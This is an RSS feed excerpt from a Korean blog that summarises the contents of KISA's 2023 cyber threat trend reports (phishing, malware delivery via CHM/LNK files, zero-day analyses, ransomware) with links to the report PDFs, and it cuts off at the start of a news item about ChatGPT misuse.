&lt;p data-ke-size=&quot;size16&quot;&gt;2-2. 안랩 ASEC 분석팀&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;:&lt;/span&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt; 사용자가 많은 MS 문서를 악요하는 악성코드 유포 방식의 변화 (MS Office 문서 악성코드 사라지고 CHM, LNK 유포 증가)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp; * CHM : 윈도우 도움말 파일, LNK : 바로가기 파일 - 파워쉘, CMD 실행해 악의적 쉘 명령어 실행가능&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #444444; text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part.3 기술 보고서&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3-1. KISA 침해사고분석단 종합분석팀 김동욱, 이슬기&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;:&lt;/span&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt; TTPs #10 : Operation GoldGoblin&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; - 제로데이 취약점을 이용해 선별적으로 침투하는 공격전략 분석&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt;3-2. KISA 침해사고분석단 취약점분석팀 이동은, 전지수&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;:&lt;/span&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt; 정부 보고서 위장 MS워드 제로데이 취약점 상세 분석&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt;3-3. KISA 침해사고분석단 취약점분석팀 박지희, 이동은&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;:&lt;/span&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;&lt;span&gt; MS Outlook 권한 상승 제로데이 취약점 (CVE-2023-23397) 상세분석&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/cgHwm2/btsEF61gPO4/ik3WSbaEunyri4e2nvFcXk/2023%EB%85%84%20%ED%95%98%EB%B0%98%EA%B8%B0%20%EC%82%AC%EC%9D%B4%EB%B2%84%20%EC%9C%84%ED%98%91%20%EB%8F%99%ED%96%A5%20%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;2023년 하반기 사이버 위협 동향 보고서.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;7.72MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71295&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71295&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1707555610197&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-description=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71295&quot; data-og-url=&quot;http://www.boho.or.kr:80&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bowlv3/hyVjjWuHq9/5d5XoHk5k5spdPkgQRTVW0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bGLoMu/hyVjeOpDG2/nvMQd3P4JIHBfKAxMQrgy1/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/nCdGX/hyVgamBmhD/hkolhQl6TvV5VMfcksyFC1/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=861_89_999_241&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71295&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71295&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bowlv3/hyVjjWuHq9/5d5XoHk5k5spdPkgQRTVW0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bGLoMu/hyVjeOpDG2/nvMQd3P4JIHBfKAxMQrgy1/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/nCdGX/hyVgamBmhD/hkolhQl6TvV5VMfcksyFC1/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=861_89_999_241');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/647</guid>
      <comments>https://jennana.tistory.com/647#entry647comment</comments>
      <pubDate>Sat, 10 Feb 2024 18:12:38 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 사이버 위협 동향 보고서(2023년 상반기)</title>
      <link>https://jennana.tistory.com/646</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[KISA]&amp;nbsp;사이버&amp;nbsp;위협&amp;nbsp;동향&amp;nbsp;보고서(2023년&amp;nbsp;상반기)&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #fbfbfb; color: #3c3c3c; text-align: center;&quot;&gt;- 한국인터넷진흥원&lt;/span&gt;&lt;span style=&quot;background-color: #fbfbfb; color: #3c3c3c; text-align: center;&quot;&gt;(KISA)에서 발간한 보고서&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;20231213_172302.jpg&quot; data-origin-width=&quot;668&quot; data-origin-height=&quot;911&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bNYqHp/btsBRPI5oVK/7Q9PxjtdpWTaKfWoz9ubLk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bNYqHp/btsBRPI5oVK/7Q9PxjtdpWTaKfWoz9ubLk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bNYqHp/btsBRPI5oVK/7Q9PxjtdpWTaKfWoz9ubLk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbNYqHp%2FbtsBRPI5oVK%2F7Q9PxjtdpWTaKfWoz9ubLk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;668&quot; height=&quot;911&quot; data-filename=&quot;20231213_172302.jpg&quot; data-origin-width=&quot;668&quot; data-origin-height=&quot;911&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #444444; text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part.1 사이버 위협 동향&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;1-1. 침해사고 현황&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;801&quot; data-origin-height=&quot;304&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qb7Cg/btsBUJ2kLr8/oJWiA6K0mJyMZgdpVOJkJk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qb7Cg/btsBUJ2kLr8/oJWiA6K0mJyMZgdpVOJkJk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qb7Cg/btsBUJ2kLr8/oJWiA6K0mJyMZgdpVOJkJk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fqb7Cg%2FbtsBUJ2kLr8%2FoJWiA6K0mJyMZgdpVOJkJk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;801&quot; height=&quot;304&quot; data-origin-width=&quot;801&quot; data-origin-height=&quot;304&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;814&quot; data-origin-height=&quot;420&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bqms37/btsBYvB0nnw/1o3bXyKd0WOkyKdiggAkrk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bqms37/btsBYvB0nnw/1o3bXyKd0WOkyKdiggAkrk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bqms37/btsBYvB0nnw/1o3bXyKd0WOkyKdiggAkrk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbqms37%2FbtsBYvB0nnw%2F1o3bXyKd0WOkyKdiggAkrk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;814&quot; height=&quot;420&quot; data-origin-width=&quot;814&quot; data-origin-height=&quot;420&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;1-2. 피싱사이트 위협 동향&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - 텔레그램 사칭 : 1치 계정 탈취 후 등록된 연락처 지인을 대상으로 2차 계정 탈취 공격까지 수행&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - 공격방식 : 1차 공격으로 탈취한 계정과 연락처 목록 수집, 2차 계정 탈취를 위해 메시지 발송하는 자동화된 피싱 도구 존재 추정. 세션 가로채기(session hijacking) 기법 보다 정교한 공격으로 진화 가능&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;1-3. 보안 취약점 및 신고 포상제 동향&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;315&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cKakXN/btsBYbjdOoX/sDdRDZAJ7VDi7uDZapM5gK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cKakXN/btsBYbjdOoX/sDdRDZAJ7VDi7uDZapM5gK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cKakXN/btsBYbjdOoX/sDdRDZAJ7VDi7uDZapM5gK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcKakXN%2FbtsBYbjdOoX%2FsDdRDZAJ7VDi7uDZapM5gK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;728&quot; height=&quot;315&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;315&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;1-4. 주요 공격 기법의 변화&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - 기업의 Active Directory와 같은 중앙 관리 솔루션을 작악한 이후 악성코드를 내부로 유포하는 기법에서 보안 소프트웨어의 제로데이 취약점을 악용하는 것으로 변화.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #444444; text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part.2 전문가 컬럼&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;2-1. 쿠팡 BlueTeam 곽성현 Staff Security Engineer&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: 맞춤형 공격 대응을 위한 기업 내 보안조직 운영 방안&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;2-2. 한국랜섬웨어침해대응센터 이경호 과장&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: 랜섬웨어 공격 구조와 취약점 패치의 중요성&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;2-3. 고려대학교 SW보안연구소 최윤성 교수&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: 3CX 연쇄 소프트웨어 공급망 공격 사건과 시사점&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;2-4. 한국전자통신연구원 사이버보안연구본부 김익균&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: 사이버 억지력 강화를 위한 &quot;Defend Forward&quot; 전략의 이해&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #444444; text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part.3 기술 보고서&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;3-1. KISA 침해사고분석단 종합분석팀 김동욱 선임, 이태우 선임, 이슬기 선임&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: TTPs $ ScarCruft Tracking Note&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;3-2. KISA 침해사고분석단 사고분석팀 신우성 선임,&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;플레인비트 이예나 선임, 이상아 연구원, 한택승 연구원&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;: 블랙캣 랜섬웨어 침해사고 기술보고서&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/cjWPbu/btsBQR0TZ5z/sW965IhYDTOecGbsYBz681/2023%EB%85%84%20%EC%83%81%EB%B0%98%EA%B8%B0%20%EC%82%AC%EC%9D%B4%EB%B2%84%20%EC%9C%84%ED%98%91%20%EB%8F%99%ED%96%A5%20%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;2023년 상반기 사이버 위협 동향 보고서.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;6.22MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처 : &lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71172&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71172&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1702455930863&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-description=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71172&quot; data-og-url=&quot;http://www.boho.or.kr:80&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/kPIcT/hyUL1vBSaq/ovkHAiFeeS3EDVZDxb4uy0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ZWEVM/hyUL5rff3m/HxRUvYUn0c4QDeTErU8dE1/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bVNk7R/hyULYyTell/TztxnVJilPBNtsxj3lldUK/img.png?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71172&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71172&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/kPIcT/hyUL1vBSaq/ovkHAiFeeS3EDVZDxb4uy0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ZWEVM/hyUL5rff3m/HxRUvYUn0c4QDeTErU8dE1/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bVNk7R/hyULYyTell/TztxnVJilPBNtsxj3lldUK/img.png?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/646</guid>
      <comments>https://jennana.tistory.com/646#entry646comment</comments>
      <pubDate>Wed, 13 Dec 2023 17:36:30 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다</title>
      <link>https://jennana.tistory.com/645</link>
      <description>&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1668&quot; data-origin-height=&quot;1014&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nUuIz/btsjnH2iTqQ/2Kpqb6FczfsrX6KLhUk4u1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nUuIz/btsjnH2iTqQ/2Kpqb6FczfsrX6KLhUk4u1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nUuIz/btsjnH2iTqQ/2Kpqb6FczfsrX6KLhUk4u1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnUuIz%2FbtsjnH2iTqQ%2F2Kpqb6FczfsrX6KLhUk4u1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1668&quot; height=&quot;1014&quot; data-origin-width=&quot;1668&quot; 